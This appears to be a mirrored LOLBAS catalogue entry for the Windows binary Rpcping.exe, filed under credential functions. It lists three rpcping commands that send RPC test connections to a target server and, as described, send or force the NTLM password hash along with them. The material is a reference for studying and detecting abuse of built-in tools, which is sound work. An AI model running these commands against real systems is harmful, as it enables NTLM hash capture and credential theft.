1
0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-03-14 19:38:33 +01:00

866 B

Rpcping.exe

  • Functions: Credentials

rpcping -s 127.0.0.1 -t ncacn_np
Send a RPC test connection to the target server (-s) sending the password hash in the process.

rpcping -s 192.168.1.10 -ncacn_np
Send a RPC test connection to the target server (-s) sending the password hash in the process.

rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.